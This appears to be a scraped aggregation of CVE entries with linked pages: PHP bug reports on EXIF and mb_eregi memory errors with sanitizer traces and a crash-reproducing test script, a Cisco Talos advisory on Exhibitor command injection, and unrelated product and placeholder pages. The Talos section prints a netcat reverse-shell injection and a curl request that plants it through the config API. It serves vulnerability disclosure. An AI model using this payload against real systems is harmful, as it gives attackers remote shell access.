When PHP EXIF extension is parsing EXIF information from an image, e.g. via exif_read_data() function, in PHP versions 7.2.x below 7.2.26, 7.3.x below 7.3.13 and 7.4.0 it is possible to supply it with data what will cause it to read past the allocated buffer. This may lead to information disclosure or crash.

Sec Bug #78793

Use-after-free in exif parsing under memory sanitizer

Submitted:

2019-11-07 21:13 UTC

Modified:

2019-12-16 19:14 UTC

From:

nikic@php.net

Assigned:

kalle (profile)

Status:

Closed

Package:

EXIF related

PHP Version:

master-Git-2019-11-07 (Git)

OS:

Private report:

No

CVE-ID:

2019-11050

 **\[2019-11-07 21:13 UTC\] nikic@php.net**

Description:
------------
$f = "ext/exif/tests/bug77950.tiff";
for ($i = 0; $i < 10; $i++) {
    fprintf(STDERR, "ITERATION $i:\\n");
    @exif\_read\_data($f);
}

This produces a use-after-free (use-of-uninitialized-value with heap deallocation origin) when run under memory sanitizer on the 7th iteration.

Unfortunately I have not been able to reproduce this under address sanitizer. Based on the fact that this needs multiple iterations, I'm assuming that this is sensitive to the precise memory layout, and memory sanitizer happens to produce the right one.

==19395==WARNING: MemorySanitizer: use-of-uninitialized-value
    #0 0x2119042 in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c:351:2
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #14 0x4368e9 in \_start (/home/nikic/php-src-msan/sapi/cli/php+0x4368e9)

  Uninitialized value was stored to memory at
    #0 0x2118d9f in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c:347:23
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0x2118818 in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c:321:13
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0x21184af in ap\_php\_conv\_10 /home/nikic/php-src-msan/main/snprintf.c
    #1 0x212e319 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:882:10
    #2 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #3 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #4 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #5 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0x2129fb3 in format\_converter /home/nikic/php-src-msan/main/snprintf.c:807:14
    #1 0x211f70f in strx\_printv /home/nikic/php-src-msan/main/snprintf.c:1237:7
    #2 0x2117fc3 in ap\_php\_snprintf /home/nikic/php-src-msan/main/snprintf.c:1282:2
    #3 0xd0a857 in add\_assoc\_image\_info /home/nikic/php-src-msan/ext/exif/exif.c:2451:10
    #4 0xcf8932 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4598:2
    #5 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #6 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #7 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #8 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #9 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #10 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #11 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #12 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

  Uninitialized value was stored to memory at
    #0 0xd5a64a in exif\_iif\_add\_value /home/nikic/php-src-msan/ext/exif/exif.c:2186:26
    #1 0xd04751 in exif\_iif\_add\_tag /home/nikic/php-src-msan/ext/exif/exif.c:2227:2
    #2 0xd3e3f0 in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3529:2
    #3 0xd49d49 in exif\_process\_IFD\_in\_MAKERNOTE /home/nikic/php-src-msan/ext/exif/exif.c:3172:8
    #4 0xd3ccfd in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3477:10
    #5 0xd274b2 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4148:12
    #6 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #7 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #8 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #9 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #10 0xd1b38e in exif\_scan\_FILE\_header /home/nikic/php-src-msan/ext/exif/exif.c:4231:9
    #11 0xd1963d in exif\_read\_from\_impl /home/nikic/php-src-msan/ext/exif/exif.c:4357:8
    #12 0xcfb4f0 in exif\_read\_from\_stream /home/nikic/php-src-msan/ext/exif/exif.c:4374:8
    #13 0xcfd036 in exif\_read\_from\_file /home/nikic/php-src-msan/ext/exif/exif.c:4401:8
    #14 0xcf4f80 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4476:9
    #15 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #16 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #17 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #18 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #19 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14

  Uninitialized value was stored to memory at
    #0 0xd29af5 in php\_ifd\_get32u /home/nikic/php-src-msan/ext/exif/exif.c:1474:3
    #1 0xd5a57f in exif\_iif\_add\_value /home/nikic/php-src-msan/ext/exif/exif.c:2186:28
    #2 0xd04751 in exif\_iif\_add\_tag /home/nikic/php-src-msan/ext/exif/exif.c:2227:2
    #3 0xd3e3f0 in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3529:2
    #4 0xd49d49 in exif\_process\_IFD\_in\_MAKERNOTE /home/nikic/php-src-msan/ext/exif/exif.c:3172:8
    #5 0xd3ccfd in exif\_process\_IFD\_TAG /home/nikic/php-src-msan/ext/exif/exif.c:3477:10
    #6 0xd274b2 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4148:12
    #7 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #8 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #9 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #10 0xd25f89 in exif\_process\_IFD\_in\_TIFF /home/nikic/php-src-msan/ext/exif/exif.c:4119:7
    #11 0xd1b38e in exif\_scan\_FILE\_header /home/nikic/php-src-msan/ext/exif/exif.c:4231:9
    #12 0xd1963d in exif\_read\_from\_impl /home/nikic/php-src-msan/ext/exif/exif.c:4357:8
    #13 0xcfb4f0 in exif\_read\_from\_stream /home/nikic/php-src-msan/ext/exif/exif.c:4374:8
    #14 0xcfd036 in exif\_read\_from\_file /home/nikic/php-src-msan/ext/exif/exif.c:4401:8
    #15 0xcf4f80 in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4476:9
    #16 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #17 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #18 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #19 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4

  Uninitialized value was created by a heap deallocation
    #0 0x43ce59 in free (/home/nikic/php-src-msan/sapi/cli/php+0x43ce59)
    #1 0x2542e28 in \_efree\_custom /home/nikic/php-src-msan/Zend/zend\_alloc.c:2425:3
    #2 0x2542402 in \_efree /home/nikic/php-src-msan/Zend/zend\_alloc.c:2545:3
    #3 0xd56453 in exif\_file\_sections\_free /home/nikic/php-src-msan/ext/exif/exif.c:2063:4
    #4 0xd0050c in exif\_discard\_imageinfo /home/nikic/php-src-msan/ext/exif/exif.c:4293:2
    #5 0xcf895b in zif\_exif\_read\_data /home/nikic/php-src-msan/ext/exif/exif.c:4604:2
    #6 0x322e991 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_UNUSED\_HANDLER /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:1226:2
    #7 0x2d67c7f in execute\_ex /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:51318:7
    #8 0x2d6927f in zend\_execute /home/nikic/php-src-msan/Zend/zend\_vm\_execute.h:55571:2
    #9 0x28399d3 in zend\_execute\_scripts /home/nikic/php-src-msan/Zend/zend.c:1645:4
    #10 0x2100536 in php\_execute\_script /home/nikic/php-src-msan/main/main.c:2586:14
    #11 0x34c922d in do\_cli /home/nikic/php-src-msan/sapi/cli/php\_cli.c:959:5
    #12 0x34c0e06 in main /home/nikic/php-src-msan/sapi/cli/php\_cli.c:1350:18
    #13 0x7fadee90fb96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-12-13 14:43 UTC\] nikic@php.net**

\-Assigned To: +Assigned To: kalle

 **\[2019-12-16 08:27 UTC\] stas@php.net**

Should we merge this for upcoming release or still wait for feedback?

 **\[2019-12-16 08:56 UTC\] nikic@php.net**

I believe this should be fine for merge. I've done a couple of hours of fuzzing with this patch as a sanity check, which didn't turn up anything.

 **\[2019-12-16 19:02 UTC\] stas@php.net**

\-Status: Assigned +Status: Closed

 **\[2019-12-16 19:14 UTC\] stas@php.net**

\-CVE-ID: +CVE-ID: 2019-11050

CVE-2019-11050: Use-after-free in exif parsing under memory sanitizer

Octeth Oempro 4.7 and 4.8 allow SQL injection. The parameter CampaignID in Campaign.Get is vulnerable.

**Latest Octeth News**

**3 Lorem ipsum dolor sit amet, consectetur adipiscing**

Heading 1 Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis vitae pulvinar velit. Vestibulum nisl metus, pretium sed suscipit quis, auctor viverra leo. Nam scelerisque ipsum sapien, at interdum

Read More

**2 Lorem ipsum dolor sit amet, consectetur adipiscing elit**

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis vitae pulvinar velit. Vestibulum nisl metus, pretium sed suscipit quis, auctor viverra leo. Nam scelerisque ipsum sapien, at interdum nisl tincidunt

Read More

**1 Lorem ipsum dolor sit amet, consectetur adipiscing elit**

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis vitae pulvinar velit. Vestibulum nisl metus, pretium sed suscipit quis, auctor viverra leo. Nam scelerisque ipsum sapien, at interdum nisl tincidunt

Read More

**Widget Title**

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

**Widget Title**

Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.

**Join our mail list to get future updates, latest news from the email marketing world.**

Email

CVE-2019-19740: Email Marketing Articles - Octeth

Zoho ManageEngine Applications Manager before 13640 allows a remote authenticated SQL injection via the Agent servlet agentid parameter to the Agent.java process function.

CVE-2019-19650: Release Notes - New features

In the Linux kernel before 5.3.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/nfc/pn533/usb.c driver, aka CID-6af3aa57a098.

CVE-2019-19526

In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e.

CVE-2019-19527

Oniguruma through 6.9.3, as used in PHP 7.3.x and other products, has a heap-based buffer over-read in str_lower_case_match in regexec.c.

Sec Bug #78559

Heap buffer overflow in mb\_eregi

Submitted:

2019-09-18 10:48 UTC

Modified:

2019-09-24 04:50 UTC

From:

nikic@php.net

Assigned:

stas (profile)

Status:

Closed

Package:

mbstring related

PHP Version:

7.3.9

OS:

Private report:

No

CVE-ID:

_None_

 **\[2019-09-18 10:48 UTC\] nikic@php.net**

Description:
------------
Against libonig 2.9.3 the test script gives:

=================================================================
==17768==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000023727 at pc 0x00000184bd62 bp 0x7ffda9f2f1d0 sp 0x7ffda9f2f1c8
READ of size 1 at 0x603000023727 thread T0
    #0 0x184bd61 in str\_lower\_case\_match /home/nikic/libonig/src/regexec.c:4017:11
    #1 0x184bd61 in slow\_search\_ic /home/nikic/libonig/src/regexec.c:4040:9
    #2 0x184bd61 in forward\_search\_range /home/nikic/libonig/src/regexec.c:4355:9
    #3 0x18487df in onig\_search\_with\_param /home/nikic/libonig/src/regexec.c:4778:17
    #4 0x1847554 in onig\_search /home/nikic/libonig/src/regexec.c:4574:7
    #5 0xa99ad0 in \_php\_mb\_onig\_search /home/nikic/php-src-fuzz/ext/mbstring/php\_mbregex.c:878:8
    #6 0xa99ad0 in \_php\_mb\_regex\_ereg\_exec /home/nikic/php-src-fuzz/ext/mbstring/php\_mbregex.c:936:6
    #7 0x168f607 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_USED\_HANDLER /home/nikic/php-src-fuzz/Zend/zend\_vm\_execute.h:1326:2
    #8 0x148597c in execute\_ex /home/nikic/php-src-fuzz/Zend/zend\_vm\_execute.h:54074:7
    #9 0x148605c in zend\_execute /home/nikic/php-src-fuzz/Zend/zend\_vm\_execute.h:58355:2
    #10 0x130625f in zend\_execute\_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4
    #11 0x10f0935 in php\_execute\_script /home/nikic/php-src-fuzz/main/main.c:2587:14
    #12 0x17979c0 in do\_cli /home/nikic/php-src-fuzz/sapi/cli/php\_cli.c:961:5
    #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php\_cli.c:1352:18
    #14 0x7ff709f62b96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310
    #15 0x447139 in \_start (/home/nikic/php-src-fuzz/sapi/cli/php+0x447139)

0x603000023727 is located 0 bytes to the right of 23-byte region \[0x603000023710,0x603000023727)
allocated by thread T0 here:
    #0 0x4bf03d in malloc (/home/nikic/php-src-fuzz/sapi/cli/php+0x4bf03d)
    #1 0x17f44c0 in set\_optimize\_exact /home/nikic/libonig/src/regcomp.c:5687:25
    #2 0x17f44c0 in set\_optimize\_info\_from\_tree /home/nikic/libonig/src/regcomp.c:5800:11
    #3 0x17f44c0 in onig\_compile /home/nikic/libonig/src/regcomp.c:6194:7
    #4 0x1817d6e in onig\_new /home/nikic/libonig/src/regcomp.c:6356:7
    #5 0xaa018d in php\_mbregex\_compile\_pattern /home/nikic/php-src-fuzz/ext/mbstring/php\_mbregex.c:467:19
    #6 0xa99a48 in \_php\_mb\_regex\_ereg\_exec /home/nikic/php-src-fuzz/ext/mbstring/php\_mbregex.c:927:7
    #7 0x168f607 in ZEND\_DO\_ICALL\_SPEC\_RETVAL\_USED\_HANDLER /home/nikic/php-src-fuzz/Zend/zend\_vm\_execute.h:1326:2
    #8 0x148597c in execute\_ex /home/nikic/php-src-fuzz/Zend/zend\_vm\_execute.h:54074:7
    #9 0x148605c in zend\_execute /home/nikic/php-src-fuzz/Zend/zend\_vm\_execute.h:58355:2
    #10 0x130625f in zend\_execute\_scripts /home/nikic/php-src-fuzz/Zend/zend.c:1643:4
    #11 0x10f0935 in php\_execute\_script /home/nikic/php-src-fuzz/main/main.c:2587:14
    #12 0x17979c0 in do\_cli /home/nikic/php-src-fuzz/sapi/cli/php\_cli.c:961:5
    #13 0x1794a0f in main /home/nikic/php-src-fuzz/sapi/cli/php\_cli.c:1352:18
    #14 0x7ff709f62b96 in \_\_libc\_start\_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310

Test script:
---------------
<?php
$str = "5b5b5b5b5b5b5b492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c52525252525252525252525252525252525252525252525252492a5bce946b5c4b5d5c6b5c4b5d5c4b5d1cceb04b5d1cceb07a73717e4b1c1cceb04b5d1cceb07a73717e4b1c302c36303030ceb07b7bd2a15c305c30663f436f6e74655c5238416711087b363030302c36303030ceb07b7b7b7b7b7b7b363030302c36303030ceb07b7b7b7b7b7b7b4a01";
$str = hex2bin($str);
var\_dump(mb\_eregi($str, $str));

**Patches**

Add a Patch

**Pull Requests**

Add a Pull Request

**History**

AllCommentsChangesGit/SVN commitsRelated reports

 **\[2019-09-18 12:11 UTC\] nikic@php.net**

It looks like this is already fixed with current oniguruma master.

 **\[2019-09-20 17:05 UTC\] cmb@php.net**

\-Status: Open +Status: Analyzed \-Assigned To: +Assigned To: stas

 **\[2019-09-24 04:51 UTC\] stas@php.net**

\-Status: Analyzed +Status: Closed

CVE-2019-19246: Heap buffer overflow in mb_eregi

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

**Summary**

An exploitable command injection vulnerability exists in the Config editor of the Exhibitor Web UI versions 1.0.9 to 1.7.1. Arbitrary shell commands surrounded by backticks or $() can be inserted into the editor and will be executed by the Exhibitor process when it launches ZooKeeper. An attacker can execute any command as the user running the Exhibitor process.

**Tested Versions**

Tested version was compiled using the standalone pom.xml from the Exhibitor master branch.

(Note that the latest released version is labeled 1.7.1, but the version in the exhibitor-standalone’s pom.xml is set to 1.6.0.)

The vulnerability should affect all versions at least as far back as 1.0.9, when the javaEnvironment variable was added.

**Product URLs**

https://github.com/soabase/exhibitor

**CVSSv3 Score**

9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command

**Details**

Exhibitor is a ZooKeeper supervisory process, which is described in the ZooKeeper documentation.

Since the ZooKeeper server will exit on an error, the Apache ZooKeeper documentation suggests a supervisory process that manages the ZooKeeper server process, mainly for the purpose of restarting ZooKeeper when it exits.

Exhibitor’s Web UI does not have any form of authentication, and prior to version 1.7.0, did not have any way to specify which interfaces to listen on. Exposing Exhibitor is dangerous for the ZooKeeper ensemble because Exhibitor allows the changing of the ZooKeeper configuration, and also provides a UI for viewing and modifying keys and values stored in ZooKeeper.

By default, the Exhibitor Web UI listens on TCP 8080. However, since this port is commonly used, it may be common to find it on other ports as well.

Under the Config tab in the Exhibitor Web UI, the “java.env script” field can be modified and the new configuration pushed to ZooKeeper. Exhibitor launches ZooKeeper through a script, and the contents of this field are passed, unmodified, as arguments to the Java command to launch ZooKeeper, which can be seen here.

(The contents of the “java.env script” field are passed in as $JVMFLAGS.)

Based on how this argument is passed, there are several ways to execute arbitrary commands. The methods tested were surrounding the command with backticks and using $(), for example:

$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)

This example uses netcat to open a reverse shell to a listener on 10.0.0.64:4444.

In the example, ZooKeeper will still launch successfully after the command executes, and it will run the command every time ZooKeeper is re-launched by Exhibitor.

**Exploit Proof of Concept**

The included screenshots show the process of obtaining a root shell on the system.

The steps to exploit it from a web browser:

1.  Open the Exhibitor Web UI and click on the Config tab, then flip the Editing switch to ON
2.  In the “java.env script” field, enter any command surrounded by $() or \`\`, for example, for a simple reverse shell:
    
    $(/bin/nc -e /bin/sh 10.0.0.64 4444 &)
    
3.  Click Commit > All At Once > OK
4.  The command may take up to a minute to execute.

It can also be performed with a single curl command:

command: curl -X POST -d @data.json http://10.0.0.200:8080/exhibitor/v1/config/set

data.json: { “zookeeperInstallDirectory”: “/opt/zookeeper”, “zookeeperDataDirectory”: “/opt/zookeeper/snapshots”, “zookeeperLogDirectory”: “/opt/zookeeper/transactions”, “logIndexDirectory”: “/opt/zookeeper/transactions”, “autoManageInstancesSettlingPeriodMs”: “0”, “autoManageInstancesFixedEnsembleSize”: “0”, “autoManageInstancesApplyAllAtOnce”: “1”, “observerThreshold”: “0”, “serversSpec”: “1:exhibitor-demo”, “javaEnvironment”: “$(/bin/nc -e /bin/sh 10.0.0.64 4444 &)”, “log4jProperties”: “”, “clientPort”: “2181”, “connectPort”: “2888”, “electionPort”: “3888”, “checkMs”: “30000”, “cleanupPeriodMs”: “300000”, “cleanupMaxFiles”: “20”, “backupPeriodMs”: “600000”, “backupMaxStoreMs”: “21600000”, “autoManageInstances”: “1”, “zooCfgExtra”: { “tickTime”: “2000”, “initLimit”: “10”, “syncLimit”: “5”, “quorumListenOnAllIPs”: “true” }, “backupExtra”: { “directory”: “” }, “serverId”: 1 }

**Mitigation**

Since Exhibitor has no built-in authentication, it would be helpful to limit the interfaces it listens on to only trusted networks, or require authentication using something like an nginx reverse proxy and block all other access using firewall rules.

If the features provided by the Exhibitor Web UI are not needed and the only needed functionality is managing the ZooKeeper process, it should be replaced with a simpler ZooKeeper supervisor solution, such as a systemd service.

**Timeline**

2019-03-08 - Vendor Disclosure  
2019-05-01 - GitHub issue #389 created; Vendor advised point of contact changed. Copy of report sent to new point of contact  
2019-05-14 - (75 day) 3rd follow up with vendor  
2019-05-29 - Final notice of public disclosure release  
2019-11-13 - Public Release

Discovered by Logan Sanderson of Cisco ASIG.

CVE-2019-5029: TALOS-2019-0790 || Cisco Talos Intelligence Group

SciLexer.dll in Scintilla in Notepad++ (x64) before 7.7 allows remote code execution or denial of service via Unicode characters in a crafted .ml file.

CVE-2019-16294: Scintilla

The cf7-invisible-recaptcha plugin before 1.3.2 for WordPress has XSS.

*   Details
*   Reviews
*   Installation
*   Development

CF7 Invisible reCAPTCHA plugin is an effective solution that secures your Contact form 7 forms on WordPress websites from spam entries while letting human pass over easily.

Just a single click they’ll confirm they are not a robot.

Activated only in cases where Google suspects that the visitor is not a human.

This plugin utilizes the popular anti-spam library, Google invisible reCAPTCHA, to help your blog stay clear of spams.

All it takes is 2 easy step to make your website stand out from rest of your competitors.

1.  Install the plugin.
2.  Add site and secret key.

It’s easy to use.

Read **How to use?** section to find out more about the CF7 Invisible reCAPTCHA configurations

**Need Support?** wp.support@vsourz.com

**Features**

*   Protection against disabled JavaScript from the browser.
*   Easy and simple settings for quick setup without a change in code.
*   Option to **Enable/Disable Protection** for Contact Form 7.
*   Easy to **Exclude** Invisible reCAPTCHA for the particular form.
*   Option to **Show/Hide** Google reCaptcha Badge.
*   Easy to Manage **Badge Position**.
*   Easy to validate your **Site Key** and **Secret key** from CF7 Invisible reCAPTCHA menu.

**How to use?**

1.  Install Plugin via WordPress Admin – Go to Admin > Plugins > Add New.
2.  Add CF7 Invisible reCAPTCHA Go To CF7 Invisible reCAPTCHA.
3.  Enable Protection for Contact Form 7.
4.  Add Site Key and Secret Key.
5.  Validate Site Key and Secret Key.

**License**

GPLv2 – https://www.gnu.org/licenses/gpl-2.0.html

**Install via WordPress Admin**

1.  Ready the zip file of the plugin
2.  Go to Admin > Plugins > Add New
3.  On the upper portion click the Upload link
4.  Using the file upload field, upload the plugin zip file here and activate the plugin

**Install via FTP**

1.  First, unzip the plugin file
2.  Using FTP go to your server’s wp-content/plugins directory
3.  Upload the unzipped plugin here
4.  Once finished login into your WP Admin and go to Admin > Plugins
5.  Look for CF7 Invisible reCAPTCHA and activate it

**Usage**

1.  Add site and secret key

**Can I Add Invisible reCAPTCHA in more than one form on the same page?**

Yes.

**Can I remove Invisible reCAPTCHA in particular form?**

Yes, we have provided exclude functionality to remove invisible reCAPTCHA in particular form.

**Can I Enable/Disable Invisible reCAPTCHA Protection for Contact Form 7?**

Yes, we have provided functionality to Enable/Disable Invisible reCAPTCHA Protection for all Contact Form.

**What to do if CF7 Invisible reCAPTCHA plugin not work?**

If the plugin does not work on the website, contact our Support Team via following email address: wp.support@vsourz.com.  
